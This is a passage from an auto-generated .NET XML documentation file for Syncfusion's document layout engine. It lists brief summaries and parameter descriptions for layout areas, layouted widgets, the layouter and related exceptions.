        <member name="M:Syncfusion.Layouting.Exceptions.LayoutException.#ctor">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.Layouting.Exceptions.LayoutException"/> class.
            </summary>
        </member>
        <member name="M:Syncfusion.Layouting.Exceptions.LayoutException.#ctor(System.Exception)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.Layouting.Exceptions.LayoutException"/> class.
            </summary>
            <param name="innerExc">The inner exc.</param>
        </member>
        <member name="M:Syncfusion.Layouting.Exceptions.LayoutException.#ctor(System.String)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.Layouting.Exceptions.LayoutException"/> class.
            </summary>
            <param name="message">The message.</param>
        </member>
        <member name="M:Syncfusion.Layouting.Exceptions.LayoutException.#ctor(System.String,System.Exception)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.Layouting.Exceptions.LayoutException"/> class.
            </summary>
            <param name="message">The message.</param>
            <param name="innerExc">The inner exc.</param>
        </member>
        <member name="M:Syncfusion.Layouting.Exceptions.LayoutException.#ctor(System.Runtime.Serialization.SerializationInfo,System.Runtime.Serialization.StreamingContext)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.Layouting.Exceptions.LayoutException"/> class.
            </summary>
            <param name="info">The object that holds the serialized object data.</param>
            <param name="context">The contextual information about the source or destination.</param>
        </member>
        <member name="T:Syncfusion.Layouting.Exceptions.InvalidLayoutStateException">
            <summary>
            The exception that is thrown when a layouting error occurs.
            </summary>
        </member>
        <member name="F:Syncfusion.Layouting.Exceptions.InvalidLayoutStateException.DEF_MESSAGE">
            <summary>
            Default exception message.
            </summary>
        </member>
        <member name="M:Syncfusion.Layouting.Exceptions.InvalidLayoutStateException.#ctor">
            <summary>
            Default constructor.
            </summary>
        </member>
        <member name="M:Syncfusion.Layouting.Exceptions.InvalidLayoutStateException.#ctor(System.Exception)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.Layouting.Exceptions.InvalidLayoutStateException"/> class.
            </summary>
            <param name="innerExc">The inner exc.</param>
        </member>
        <member name="M:Syncfusion.Layouting.Exceptions.InvalidLayoutStateException.#ctor(System.String)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.Layouting.Exceptions.InvalidLayoutStateException"/> class.
            </summary>
            <param name="message">The message.</param>
        </member>
        <member name="M:Syncfusion.Layouting.Exceptions.InvalidLayoutStateException.#ctor(System.String,System.Exception)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.Layouting.Exceptions.InvalidLayoutStateException"/> class.
            </summary>
            <param name="message">The message.</param>
            <param name="innerExc">The inner exc.</param>
        </member>
        <member name="T:Syncfusion.Layouting.ITableLayoutInfo">
            <summary>
            Summary description for TableLayoutInfo.
            </summary>
        </member>
        <member name="P:Syncfusion.Layouting.ITableLayoutInfo.Width">
            <summary>
            Gets or sets the width.
            </summary>
            <value>The width.</value>
        </member>
        <member name="P:Syncfusion.Layouting.ITableLayoutInfo.Height">
            <summary>
            Gets the height.
            </summary>
            <value>The height.</value>
        </member>
        <member name="P:Syncfusion.Layouting.ITableLayoutInfo.CellsWidth">
            <summary>
            Gets or sets the width of the cells.
            </summary>
            <value>The width of the cells.</value>
        </member>
        <member name="P:Syncfusion.Layouting.ITableLayoutInfo.HeadersRowCount">
            <summary>
            Gets the headers row count.
            </summary>
            <value>The headers row count.</value>
        </member>
        <member name="P:Syncfusion.Layouting.ITableLayoutInfo.IsDefaultCells">
            <summary>
            Gets the is default cells.
            </summary>
            <value>The is default cells.</value>
        </member>
        <member name="P:Syncfusion.Layouting.ITableLayoutInfo.IsSplittedTable">
            <summary>
            Gets or sets if the table is splitted
            </summary>
        </member>
        <member name="P:Syncfusion.Layouting.ITableLayoutInfo.CellSpacings">
            <summary>
            Gets the cell spacings.
            </summary>
            <value>The cell spacings.</value>
        </member>
        <member name="P:Syncfusion.Layouting.ITableLayoutInfo.CellPaddings">
            <summary>
            Gets the cell paddings.
            </summary>
            <value>The cell paddings.</value>
        </member>
        <member name="T:Syncfusion.Layouting.LayoutArea">
            <summary>
            Class representing the layout area.
            </summary>
        </member>
        <member name="F:Syncfusion.Layouting.LayoutArea.m_area">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.Layouting.LayoutArea.m_clientArea">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.Layouting.LayoutArea.m_clientActiveArea">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.Layouting.LayoutArea.m_spacings">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.Layouting.LayoutArea.m_bSkipSubtractWhenInvalidParameter">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.Layouting.LayoutArea.#ctor">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.Layouting.LayoutArea"/> class.
            </summary>
        </member>
        <member name="M:Syncfusion.Layouting.LayoutArea.#ctor(System.Drawing.RectangleF)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.Layouting.LayoutArea"/> class.
            </summary>
            <param name="area">The area.</param>
        </member>
        <member name="M:Syncfusion.Layouting.LayoutArea.#ctor(System.Drawing.RectangleF,Syncfusion.Layouting.ILayoutSpacingsInfo,Syncfusion.Layouting.IWidget)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.Layouting.LayoutArea"/> class.
            </summary>
            <param name="area">The area.</param>
            <param name="spacings">The spacings.</param>
        </member>
        <member name="M:Syncfusion.Layouting.LayoutArea.CutFromLeft(System.Double)">
            <summary>
            Cuts from left.
            </summary>
            <param name="x">The x.</param>
        </member>
        <member name="M:Syncfusion.Layouting.LayoutArea.UpdateDynamicRelayoutBounds(System.Single,System.Single,System.Boolean,System.Single)">
            <summary>
            Updates the dynamic relayout bounds.
            </summary>
            <param name="x">The x.</param>
            <param name="y">The y.</param>
            <param name="isNeedToUpdateWidth">if set to <c>true</c> [is need to update width].</param>
            <param name="width">The width.</param>
        </member>
        <member name="M:Syncfusion.Layouting.LayoutArea.CutFromTop(System.Double)">
            <summary>
            Cuts from top.
            </summary>
            <param name="y">The y.</param>
        </member>
        <member name="M:Syncfusion.Layouting.LayoutArea.CutFromTop(System.Double,System.Single)">
            <summary>
            Cuts from top.
            </summary>
            <param name="y">The y.</param>
        </member>
        <member name="M:Syncfusion.Layouting.LayoutArea.CutFromTop">
            <summary>
            Cuts from top.
            </summary>
        </member>
        <member name="M:Syncfusion.Layouting.LayoutArea.UpdateClientActiveArea(System.Drawing.RectangleF)">
            <summary>
            When second layouting occurs the clientactivearea has assigned a new value.
            </summary>
        </member>
        <member name="M:Syncfusion.Layouting.LayoutArea.UpdateClientArea(Syncfusion.Layouting.IWidget)">
            <summary>
            Updates the client area.
            </summary>
        </member>
        <member name="M:Syncfusion.Layouting.LayoutArea.UpdateBounds(System.Single)">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.Layouting.LayoutArea.UpdateBoundsBasedOnTextWrap(System.Single)">
            <summary>
            Update Bounds based on Text Wrap
            </summary>
            <param name="textBoxBounds"></param>
            <param name="layoutInfo"></param>
        </member>
        <member name="M:Syncfusion.Layouting.LayoutArea.UpdateWidth(System.Single)">
            <summary>
            Updates the Width
            </summary>
            <param name="width"></param>
        </member>
        <member name="M:Syncfusion.Layouting.LayoutArea.UpdateLeftPosition(System.Single)">
            <summary>
            Updates the left position
            </summary>
            <param name="left"></param>
        </member>
        <member name="P:Syncfusion.Layouting.LayoutArea.Width">
            <summary>
            Gets the width.
            </summary>
            <value>The width.</value>
        </member>
        <member name="P:Syncfusion.Layouting.LayoutArea.Height">
            <summary>
            Gets the height.
            </summary>
            <value>The height.</value>
        </member>
        <member name="P:Syncfusion.Layouting.LayoutArea.SkipSubtractWhenInvalidParameter">
            <summary>
            Gets or sets a value indicating whether [skips subtract when invalid parameter].
            </summary>
            <value>
            true if [skips subtract when invalid parameter]; otherwise, false.
            </value>
        </member>
        <member name="P:Syncfusion.Layouting.LayoutArea.Margins">
            <summary>
            Gets the margins.
            </summary>
            <value>The margins.</value>
        </member>
        <member name="P:Syncfusion.Layouting.LayoutArea.Paddings">
            <summary>
            Gets the paddings.
            </summary>
            <value>The paddings.</value>
        </member>
        <member name="P:Syncfusion.Layouting.LayoutArea.OuterArea">
            <summary>
            Gets the outer area.
            </summary>
            <value>The outer area.</value>
        </member>
        <member name="P:Syncfusion.Layouting.LayoutArea.ClientArea">
            <summary>
            Gets the client area.
            </summary>
            <value>The client area.</value>
        </member>
        <member name="P:Syncfusion.Layouting.LayoutArea.ClientActiveArea">
            <summary>
            Gets the client active area.
            </summary>
            <value>The client active area.</value>
        </member>
        <member name="T:Syncfusion.Layouting.LayoutedWidget">
            <summary>
            Summary description for ILayoutedRange.
            </summary>
        </member>
        <member name="F:Syncfusion.Layouting.LayoutedWidget.m_bounds">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.Layouting.LayoutedWidget.m_widget">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.Layouting.LayoutedWidget.m_ltWidgets">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.Layouting.LayoutedWidget.m_textTag">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.Layouting.LayoutedWidget.m_wordSpace">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.Layouting.LayoutedWidget.m_horizontalAlign">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.Layouting.LayoutedWidget.m_subWidth">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.Layouting.LayoutedWidget.m_spaces">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.Layouting.LayoutedWidget.m_rightPosition">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.Layouting.LayoutedWidget.m_skipLeftPosition">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.Layouting.LayoutedWidget.m_prevTabJustification">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.Layouting.LayoutedWidget.m_owner">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.Layouting.LayoutedWidget.m_bFlags">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.Layouting.LayoutedWidget.m_footnoteHeight">
            <summary>
            Specifies the footnote textbody height of the current line
            </summary>
        </member>
        <member name="F:Syncfusion.Layouting.LayoutedWidget.m_endnoteHeight">
            <summary>
            Specifies the endnote textbody height of the current line
            </summary>
        </member>
        <member name="M:Syncfusion.Layouting.LayoutedWidget.#ctor(Syncfusion.Layouting.IWidget)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.Layouting.LayoutedWidget"/> class.
            </summary>
            <param name="widget">The widget.</param>
        </member>
        <member name="M:Syncfusion.Layouting.LayoutedWidget.#ctor">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.Layouting.LayoutedWidget"/> class.
            </summary>
            <param name="widget">The widget.</param>
        </member>
        <member name="M:Syncfusion.Layouting.LayoutedWidget.#ctor(Syncfusion.Layouting.IWidget,System.Drawing.PointF)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.Layouting.LayoutedWidget"/> class.
            </summary>
            <param name="widget">The widget.</param>
            <param name="location">The location.</param>
        </member>
        <member name="M:Syncfusion.Layouting.LayoutedWidget.GetFootnoteHeight(System.Single@)">
            <summary>
            Get the footnote textbody height
            </summary>
            <param name="ltWidget"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.Layouting.LayoutedWidget.GetFootnoteHeightForTableRow(System.Single@,Syncfusion.Layouting.LayoutedWidget)">
            <summary>
            Get the footnote textbody height
            </summary>
            <param name="ltWidget"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.Layouting.LayoutedWidget.GetChildParagraphWidgets(Syncfusion.Layouting.LayoutedWidget)">
            <summary>
            Retreive pagragraphs present in the cells.
            </summary>
            <returns>paragraph widget of cells</returns>
        </member>
        <member name="M:Syncfusion.Layouting.LayoutedWidget.IsTableWidget(Syncfusion.Layouting.IWidget)">
            <summary>
            Determines whether the given widget is Table widget or not.
            </summary>
            <param name="widget">The widget.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.Layouting.LayoutedWidget.GetFrameClipBounds(System.Drawing.RectangleF,Syncfusion.DocIO.DLS.WParagraphFormat,Syncfusion.Layouting.ParagraphLayoutInfo)">
            <summary>
            Gets the frame clip bounds
            </summary>
            <param name="bounds">Current paragraph widget bounds</param>
            <param name="paragraphFormat">Current paragraph paragraph format</param>
            <param name="paraLayoutInfo">Paragrph layoutinfo</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.Layouting.LayoutedWidget.GetOwnerLayoutedWidget(Syncfusion.Layouting.LayoutedWidget)">
            <summary>
            Get Cell Widget
            </summary>
            <param name="ltWidget"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.Layouting.LayoutedWidget.GetCellWidget(Syncfusion.Layouting.LayoutedWidget)">
            <summary>
            Get owner widget of the cell
            </summary>
            <param name="ltWidget"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.Layouting.LayoutedWidget.GetParagraphWidget(Syncfusion.Layouting.LayoutedWidget)">
            <summary>
            Gets the owner widget of the paragraph
            </summary>
            <param name="ltWidget"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.Layouting.LayoutedWidget.IsBehindWidget(Syncfusion.Layouting.IWidget)">
            <summary>
            Checks the type of the widget.
            </summary>
            <param name="widget">The widget.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.Layouting.LayoutedWidget.InitLayoutInfo">
            <summary>
            Initializing LayoutInfo value to null
            </summary>
        </member>
        <member name="M:Syncfusion.Layouting.LayoutedWidget.InitLayoutInfo(System.Boolean)">
            <summary>
            Initializing LayoutInfo value to null
            </summary>
        </member>
        <member name="M:Syncfusion.Layouting.LayoutedWidget.InitLayoutInfoAll">
            <summary>
            Initializes the layout information all.
            </summary>
        </member>
        <member name="M:Syncfusion.Layouting.LayoutedWidget.IsOverLappedShapeWidget(Syncfusion.Layouting.LayoutedWidget)">
            <summary>
            Determines whether the layouted widget is Overlapping Widget
            </summary>
            <param name="ltWidget">The lt widget.</param>
            <returns>
            	<c>true</c> if the layouted widget is Overlapping shape widget; otherwise, <c>false</c>.
            </returns>
        </member>
        <member name="M:Syncfusion.Layouting.LayoutedWidget.ShiftLocation(System.Double,System.Double,System.Boolean,System.Boolean)">
            <summary>
            
            </summary>
            <param name="xOffset"></param>
            <param name="yOffset"></param>
            <param name="isPictureNeedToBeShifted"></param>
            <param name="isFromFloatingItemVerticalAlignment"></param>
        </member>
        <member name="M:Syncfusion.Layouting.LayoutedWidget.ShiftLocation(System.Double,System.Double,System.Boolean,System.Boolean,System.Boolean)">
            <summary>
            Shifts the location.
            </summary>
            <param name="xOffset">The x offset.</param>
            <param name="yOffset">The y offset.</param>
        </member>
        <member name="M:Syncfusion.Layouting.LayoutedWidget.IsFloatingItemNeedToBeAlign(Syncfusion.Layouting.IWidget)">
            <summary>
            Determines whether the floating items need to be align or not.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.Layouting.LayoutedWidget.CompatibilityCheck(Syncfusion.DocIO.DLS.CompatibilityMode,System.Boolean,System.Boolean)">
            <summary>
            Determines whether the floatting item need to be align or not based on the compatibility mode.
            </summary>
            <param name="compatibilityMode">The compatibility mode.</param>
            <param name="dontVertAlignCellWithSp">if set to <c>true</c> [dont vert align cell with sp].</param>
            <param name="layoutInCell">if set to <c>true</c> [layout in cell].</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.Layouting.LayoutedWidget.ShiftLocation(System.Double,System.Double,System.Single,System.Single)">
            <summary>
            Shifts the location.
            </summary>      
            <param name="xOffset">The X offset</param>
             <param name="yOffset">The y offset.</param>s        
             <param name="footerHeight">Height of the footer.</param>
             <param name="pageHeight">Height of the page.</param>
        </member>
        <member name="M:Syncfusion.Layouting.LayoutedWidget.ShiftLocation(System.Double,System.Double,System.Single,System.Single,System.Single)">
            <summary>
            Shifts the location.
            </summary>
            <param name="xOffset">The x offset.</param>
            <param name="yOffset">The y offset.</param>
            <param name="isPictureNeedToBeShifted">if set to <c>true</c> [is picture need to be shifted].</param>
            <param name="footerHeight">Height of the footer.</param>
            <param name="pageHeight">Height of the page.</param>
        </member>
        <member name="M:Syncfusion.Layouting.LayoutedWidget.IsShiftAbsTableBasedOnPageBottom(Syncfusion.Layouting.LayoutedWidget,System.Double)">
            <summary>
            The absolute table shifted based on bottom if absolute table bottom exceeded the page bottom. 
            </summary>
            <param name="ltWidget">The widget</param>
            <param name="xOffset">The x offset.</param>
        </member>
        <member name="M:Syncfusion.Layouting.LayoutedWidget.GetBaseEntity(Syncfusion.DocIO.DLS.Entity)">
            <summary>
            Get the base entity
            </summary>
            <param name="entity"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.Layouting.LayoutedWidget.UpdateLtWidgetBounds(System.Single,System.Single,System.Single,System.Single)">
            <summary>
            Update Layouted Widget Bounds for the Nested Table
            </summary>
            <param name="width"></param>
            <param name="height"></param>
            <param name="totalWidth">Owner cell Width</param>
            <param name="totalHeight">Owner cell Height</param>
        </member>
        <member name="M:Syncfusion.Layouting.LayoutedWidget.IsLtWidgetBoundsNeedToUpdate(Syncfusion.Layouting.LayoutedWidget)">
            <summary>
            Determine Whether the layouted Widget Bounds is need to be update or not.
            </summary>
            <param name="ltWidget"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.Layouting.LayoutedWidget.AlignBottom(Syncfusion.DocIO.Rendering.DrawingContext,System.Single,System.Single,System.Boolean)">
            <summary>
            Aligns the bottom.
            </summary>
            <param name="g">The g.</param>
        </member>
        <member name="M:Syncfusion.Layouting.LayoutedWidget.ShiftLineWidgetYPosition(Syncfusion.DocIO.Rendering.DrawingContext,System.Double@,System.Double@,System.Double@,System.Single@,System.Boolean)">
            <summary>
            Shifts the line child widgets based on top Ascent value
            </summary>
            <param name="dc">Drawing context</param>
            <param name="maxAscent">Maximum Ascent</param>
            <param name="topLineSpace">Top line space</param>
            <param name="maxHeight">Maximum height</param>
            <param name="extraLineAscent">Extra line ascent</param>
            <param name="isInlineDrawingObject">Refers the inline floating item is inside the line when the paragraph line spcing rule is exactly</param>
        </member>
        <member name="M:Syncfusion.Layouting.LayoutedWidget.GetParagraph">
            <summary>
            Gets the paragraph.
            </summary>
            <param name="widget">The widget.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.Layouting.LayoutedWidget.CalculateMaxChildWidget(Syncfusion.DocIO.Rendering.DrawingContext,Syncfusion.DocIO.DLS.WParagraph,System.Boolean,System.Boolean,System.Double@,System.Double@,System.Double@,System.Double@,System.Double@,System.Single@,Syncfusion.Layouting.IStringWidget@,System.Boolean@,System.Boolean@,System.Boolean@)">
            <summary>
            Calculates the max child widget.
            </summary>
            <param name="g">The g.</param>
            <param name="maxHeight">Height of the max.</param>
            <param name="maxAscent">The max ascent.</param>
        </member>
        <member name="M:Syncfusion.Layouting.LayoutedWidget.IsInlineFloatingItem(Syncfusion.Layouting.IWidget)">
            <summary>
            Determines whether [is inline floating item] [the specified item].
            </summary>
            <param name="item">The item.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.Layouting.LayoutedWidget.AlignCenter(Syncfusion.DocIO.Rendering.DrawingContext,System.Double,System.Boolean)">
            <summary>
            Aligns the Center
            </summary>
            <param name="dc">The Custom graphics.</param>
            <param name="subWidth">Width of the sub</param>
            <param name="isAlignCenter">is for center align</param>
        </member>
        <member name="M:Syncfusion.Layouting.LayoutedWidget.AlignRight(Syncfusion.DocIO.Rendering.DrawingContext,System.Double,System.Boolean)">
            <summary>
            Aligns the Right
            </summary>
            <param name="dc">The Custom graphics.</param>
            <param name="subWidth">Width of the sub</param>
            <param name="isAlignCenter">is for center align</param>
        </member>
        <member name="M:Syncfusion.Layouting.LayoutedWidget.AlignCenterorRight(Syncfusion.DocIO.Rendering.DrawingContext,System.Double,System.Boolean)">
            <summary>
            Aligns the Right
            </summary>
            <param name="dc">The Custom graphics.</param>
            <param name="subWidth">Width of the sub</param>
        </member>
        <member name="M:Syncfusion.Layouting.LayoutedWidget.ValidLayoutedItemRightPosition(Syncfusion.DocIO.Rendering.DrawingContext)">
            <summary>
            Consider valuable right positon in layputed widget collection for right alignment
            </summary>
            <param name="dc"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.Layouting.LayoutedWidget.AlignJustify(Syncfusion.DocIO.Rendering.DrawingContext,System.Double,System.Boolean)">
            <summary>
            Aligns the justify.
            </summary>
            <param name="GraphicsContext">The custom graphics.</param>
            <param name="subWidth">Width of the sub.</param>
        </member>
        <member name="M:Syncfusion.Layouting.LayoutedWidget.IsNeedToTrimTextRange(System.Int32,Syncfusion.Layouting.LayoutedWidgetList)">
            <summary>
            Check wether the next layouted widget's has renderable content whose width is greater than zero
            </summary>
            <param name="index"></param>
            <param name="childWidgets"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.Layouting.LayoutedWidget.GetTabIndex">
            <summary>
            Get index of the tab from the current line
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.Layouting.LayoutedWidget.GetTextRange(Syncfusion.Layouting.IWidget)">
            <summary>
            Get the Text Range
            </summary>
            <param name="?"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.Layouting.LayoutedWidget.GetSpaceDelta(System.Int32,System.Double,System.Int32[],System.Int32)">
            <summary>
            Get Space Delta
            </summary>
            <param name="countAllSpaces"></param>
            <param name="subWidth"></param>
            <param name="widgetSpaces"></param>
            <param name="index"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.Layouting.LayoutedWidget.UpdateParaFirstLineHorizontalPositions(Syncfusion.Layouting.ParagraphLayoutInfo,Syncfusion.Layouting.IWidget,System.Single@,System.Single@)">
            <summary>
            Updates the para first line horizontal positions.
            </summary>
            <param name="paragraphInfo">The paragraph information.</param>
            <param name="widget">The widget.</param>
            <param name="x">The x.</param>
            <param name="width">The width.</param>
        </member>
        <member name="M:Syncfusion.Layouting.LayoutedWidget.IsIncludeWidgetInLineHeight(Syncfusion.Layouting.IWidget)">
            <summary>
            Determines whether it includes the specified widget in line height.
            </summary>
            <param name="widget">The widget.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.Layouting.LayoutedWidget.IsIncludeTextWidgetInLineHeight(Syncfusion.Layouting.IWidget)">
            <summary>
            Determines whether it includes the specified text widget in line height.
            </summary>
            <param name="widget">The widget.</param>
            <returns></returns>
        </member>
        <member name="P:Syncfusion.Layouting.LayoutedWidget.PrevTabJustification">
            <summary>
            Gets or sets the prev tab justification.
            </summary>
            <value>The prev tab justification.</value>
        </member>
        <member name="P:Syncfusion.Layouting.LayoutedWidget.Spaces">
            <summary>
            Gets or sets the no. of spaces
            </summary>
        </member>
        <member name="P:Syncfusion.Layouting.LayoutedWidget.IsLastLine">
            <summary>
            True, if it is last line of the paragraph
            </summary>
        </member>
        <member name="P:Syncfusion.Layouting.LayoutedWidget.SubWidth">
            <summary>
            Gets or Sets the SubWidth
            </summary>
        </member>
        <member name="P:Syncfusion.Layouting.LayoutedWidget.HorizontalAlign">
            <summary>
            Gets or sets the HorizontalAlignment
            </summary>
        </member>
        <member name="P:Syncfusion.Layouting.LayoutedWidget.WordSpace">
            <summary>
            Gets or sets the Extra Wordspace, needs to be added while justifying
            </summary>
        </member>
        <member name="P:Syncfusion.Layouting.LayoutedWidget.TextTag">
            <summary>
            Gets or sets the text tag.
            </summary>
            <value>The text tag.</value>
        </member>
        <member name="P:Syncfusion.Layouting.LayoutedWidget.Bounds">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.Layouting.LayoutedWidget.Widget">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.Layouting.LayoutedWidget.ChildWidgets">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.Layouting.LayoutedWidget.Owner">
            <summary>
            Gets or sets Owner Layouted Widget
            </summary>
        </member>
        <!-- Badly formed XML comment ignored for member "P:Syncfusion.Layouting.LayoutedWidget.IsLastItemInPage" -->
        <!-- Badly formed XML comment ignored for member "P:Syncfusion.Layouting.LayoutedWidget.IsNotFitted" -->
        <member name="P:Syncfusion.Layouting.LayoutedWidget.IsContainsSpaceCharAtEnd">
            <summary>
            Indicate the word which contains trimmed empty spaces charcters at end
            </summary>
        </member>
        <member name="T:Syncfusion.Layouting.LayoutedWidgetList">
            <summary>
            Represents the collection of layouted widget.
            </summary>
        </member>
        <member name="T:Syncfusion.Layouting.Layouter">
            <summary>
            Class represents the layouter.
            </summary>
        </member>
        <member name="T:Syncfusion.Layouting.ILCOperator">
            <summary>
            Represents an layouting operator.
            </summary>
        </member>
        <member name="M:Syncfusion.Layouting.ILCOperator.SendLeafLayoutAfter(Syncfusion.Layouting.LayoutedWidget,System.Boolean)">
            <summary>
            Sends the event that current leaf widget lay outed complete.
            </summary>
            <param name="ltWidget">The widget.</param>
        </member>
        <member name="P:Syncfusion.Layouting.ILCOperator.DrawingContext">
            <summary>
            Gets or sets the custom graphics.
            </summary>
            <value>The custom graphics.</value>
        </member>
        <member name="F:Syncfusion.Layouting.Layouter.m_drawingContext">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.Layouting.Layouter.m_clientLayoutArea">
            <summary>
            Client LayoutArea
            </summary>
        </member>
        <member name="F:Syncfusion.Layouting.Layouter.m_FloatingTableBottom">
            <summary>
            Holds the absolute table height
            </summary>
        </member>
        <!-- Badly formed XML comment ignored for member "F:Syncfusion.Layouting.Layouter.m_pageTop" -->
        <!-- Badly formed XML comment ignored for member "F:Syncfusion.Layouting.Layouter.m_wrappingDifference" -->
        <!-- Badly formed XML comment ignored for member "F:Syncfusion.Layouting.Layouter.m_frameHeight" -->
        <!-- Badly formed XML comment ignored for member "F:Syncfusion.Layouting.Layouter.m_firstItemInPageYPosition" -->
        <member name="M:Syncfusion.Layouting.Layouter.Layout(Syncfusion.Layouting.IWidgetContainer,Syncfusion.Layouting.ILayoutProcessHandler,Syncfusion.DocIO.Rendering.DrawingContext,System.Int32)">
            <summary>
            Layout specified widget container.
            <remarks>Method use ILayoutProcessHandler for control layout process</remarks>
            </summary>
            <param name="widget">The widget.</param>
            <param name="handler">The handler.</param>
            <param name="dc">The dc.</param>
        </member>
        <member name="M:Syncfusion.Layouting.Layouter.IsCurrentWidgetNeedToLayout(Syncfusion.Layouting.LayoutContext,System.Int32,System.Boolean@,System.Boolean@,System.Boolean)">
            <summary>
            check whether the current widget is need to be layout
            </summary>
            <param name="lc"></param>
            <param name="isSplittedWidget"></param>
            <param name="isCurrentWidgetNeedToLayout"></param>
            <param name="isContinuousSection"></param>
        </member>
        <member name="M:Syncfusion.Layouting.Layouter.Syncfusion#Layouting#ILCOperator#SendLeafLayoutAfter(Syncfusion.Layouting.LayoutedWidget,System.Boolean)">
            <summary>
            Sends the event that current leaf widget lay outed complete.
            </summary>
            <param name="ltWidget">The widget.</param>
        </member>
        <member name="E:Syncfusion.Layouting.Layouter.LeafLayoutAfter">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.Layouting.Layouter.IsNeedToRestartFootnote">
            <summary>
            Gets and set the IsNeedToRestartFootnote
            </summary>
        </member>
        <member name="P:Syncfusion.Layouting.Layouter.IsNeedToRestartEndnote">
            <summary>
            Gets and set the IsNeedToRestartEndnote
            </summary>
        </member>
        <member name="P:Syncfusion.Layouting.Layouter.IsNeedToRestartFootnoteID">
            <summary>
            Gets and set the IsNeedToRestartFootnoteID
            </summary>
        </member>
        <member name="P:Syncfusion.Layouting.Layouter.IsNeedToRestartEndnoteID">
            <summary>
            Gets and set the IsNeedToRestartEndnoteID
            </summary>
        </member>
        <member name="P:Syncfusion.Layouting.Layouter.CurrPageIndex">
            <summary>
            Gets the current page index
            </summary>
        </member>
        <member name="P:Syncfusion.Layouting.Layouter.IsRowFitInSamePage">
            <summary>
            Gets or sets the IsRowFitInSamePage.
            </summary>
        </member>
        <member name="P:Syncfusion.Layouting.Layouter.IsLayoutingHeaderRow">
            <summary>
            Gets or sets the IsLayoutingHeaderRow.
            </summary>
        </member>
        <member name="P:Syncfusion.Layouting.Layouter.DrawingContext">
            <summary>
            Gets or sets the custom graphics.
            </summary>
            <value>The custom graphics.</value>
        </member>
        <member name="P:Syncfusion.Layouting.Layouter.ClientLayoutArea">
            <summary>
            Gets the Client LayoutArea.
            </summary>
            <value>The ClientLayoutArea.</value>
        </member>
        <member name="P:Syncfusion.Layouting.Layouter.FloatingTableBottom">
            <summary>
            Get and set the absolute table height 
            </summary>
        </member>
        <!-- Badly formed XML comment ignored for member "P:Syncfusion.Layouting.Layouter.PageTopMargin" -->
        <member name="P:Syncfusion.Layouting.Layouter.FrameLayoutArea">
            <summary>
            Gets the frame layout area.
            </summary>
            <value>The frame layout area.</value>
        </member>
        <member name="P:Syncfusion.Layouting.Layouter.FrameHeight">
            <summary>
            Gets the frame Height with Height type as Atleast
            </summary>
            <value>The frame height</value>
        </member>
        <member name="P:Syncfusion.Layouting.Layouter.IsLayoutingHeaderFooter">
            <summary>
            Gets the IsLayoutingHeaderFooter.
            </summary>
            <value>The IsLayoutingHeaderFooter.</value>
        </member>
        <member name="P:Syncfusion.Layouting.Layouter.IsLayoutingHeader">
            <summary>
            Gets the IsLayoutingHeader
            </summary>
            <value>The IsLayoutingHeader</value>
        </member>
        <member name="P:Syncfusion.Layouting.Layouter.IsFirstItemInPage">
            <summary>
            Gets the IsFirstItemInPage
            </summary>
            <value>The IsFirstItemInPage</value>
        </member>
        <member name="P:Syncfusion.Layouting.Layouter.IsFirstItemInLine">
